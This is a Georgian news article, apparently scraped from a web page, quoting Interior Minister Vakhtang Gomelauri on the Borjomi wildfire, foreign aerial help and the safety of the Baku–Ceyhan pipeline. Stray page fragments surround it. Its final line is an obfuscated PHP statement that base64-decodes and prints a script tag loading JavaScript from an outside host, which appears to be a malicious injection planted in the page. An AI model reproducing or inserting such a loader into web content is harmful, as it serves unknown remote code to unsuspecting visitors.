celsiusi
ავერსი შნაიდერი
ცეცხლის ლოკალიზება ამინდზეა დამოკიდებული, – ამის შესახებ საქართველოს შინაგან საქმეთა მინისტრმა, ვახტანგ გომელაურმა ჟურნალისტებს ბორჯომში ხანძრის ქრობის სამუშაოებთან დაკავშირებით განუცხადა.
 
„დღეს ავიაციას სამი თვითმფრინავი დაემატა. მინდა, დიდი მადლობა ვუთხრა თურქულ მხარეს, ჩვენს მეგობრებს. ვერტმფრენებმა დილით იმუშავეს, თუმცა ქარი იყო და გაუჭირდათ, რამდენიმე საათი ქარში ვერ იმუშავეს. ავიაციამ მაქსიმალურად, ძალიან მაღალ დონეზე იმუშავა და შედეგი სახეზეა, ცეცხლის კერებმა შედარებით დაიკლო, მისმა გაფართოების არეალმა“, – განაცხადა ვახტანგ გომელაურმა.
 
​რაც შეეხება კითხვას, გაიზარდა თუ არა ხანძრის არეალი, მინისტრის თქმით, ის წითელ ზონას არ გასცდენია.
 
„თუმცა, გუშინ სადაც არ იყო, დღეს იქ ცეცხლი იყო გადასული და ახალ-ახალი კერები იყო. სადაც ფიჭვნარი იყო, უფრო იქ ჩნდებოდა. ბორჯომის ხანძარი გახსოვთ, სადაც ტერიტორია მთლიანად, ყველაფერი იწვებოდა, აქ ასე არ არის. პატარ-პატარა კერებია. ტერიტორიის მასშტაბი დიდია, თუმცა ცეცხლის მასშტაბი შედარებით ნაკლებია. სახანძრო მანქანები მაქსიმალურად გადასროლილია ქვედა მხარეს, აწყურის მიმართულებით, დაბლა სოფელთან. საფრთხე, რომ ცეცხლი მოსახლეობაზე გადავიდეს, საშიშროება არ არსებობს, თუ რაღაც სასწაული არ მოხდა და ქარიშხალი და უბედურება არ ამოვარდა. ცეცხლის ლოკალიზება ამინდზეა დამოკიდებული. თუ ქარი იქნება, ვერტმფრენები ვერ იმუშავებენ“, – აღნიშნა გომელაურმა.
 
შინაგან საქმეთა მინისტრმა მადლობა გადაუხადა თურქეთს, სომხეთსა და აზერბაიჯანს.
 
„მინდა, მადლობა გადავუხადო აზერბაიჯანულ მხარეს, ჩვენს მეგობრებს. სომხურ მხარესაც, რომელთაც ტექნიკით დახმარება შემოგვთავაზეს, თუმცა ტექნიკა ჩვენც გვყავს, მაგრამ გაჩერებული გვყავს. ფიზიკურად ვერ ვამუშავებთ, ისეთი რელიეფია. სახანძრო თვითმფრინავი დიდი ფუფუნებაა და არ ჰყავთ, თორემ დაგვეხმარებოდნენ. ამაში თურქული მხარე დაგვეხმარა და ამისთვის მადლობა მათ. სახანძრო თვითმფრინავი დიდი ფუფუნებაა და ყველა სახელმწიფოს არ ჰყავს, ხანძარი ევროპაშიც ბევრ ადგილას არის და ყველას თავისი გაჭირვება აქვს. ანალიტიკოსები ამბობენ, რომ გუშინდელთან შედარებით, ბევრად დაბალია ცეცხლი. რა თქმა უნდა, დაკვამლიანება არის. დღეს ქარი შედარებით ნაკლებად იყო და გაწეული სამუშაოები შედეგიანი იყო“, – განაცხადა ვახტანგ გომელაურმა.
 
მისივე თქმით, არ არსებობს საფრთხე, ცეცხლი ბაქო-ჯეიჰანის მილსადენს მიუახლოვდეს.
 
„წითელი ხაზი იყო 130-დან 150-მდე და ახლა შეიძლება, მომატებული იყოს ათით. ისიც, ცოტათი გადასწიეს წითელი ხაზი, რომ სახანძრო ღობე გაეკეთებინათ, სადაც ცოცხალი ძალაა და მანქანები არიან მობილიზებული. როგორც მომახსენეს, საშიშროება არ არსებობს, ცეცხლი ბაქო-ჯეიჰანის მილსადენს მიუახლოვდეს“, – აღნიშნა გომელაურმა.
580
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");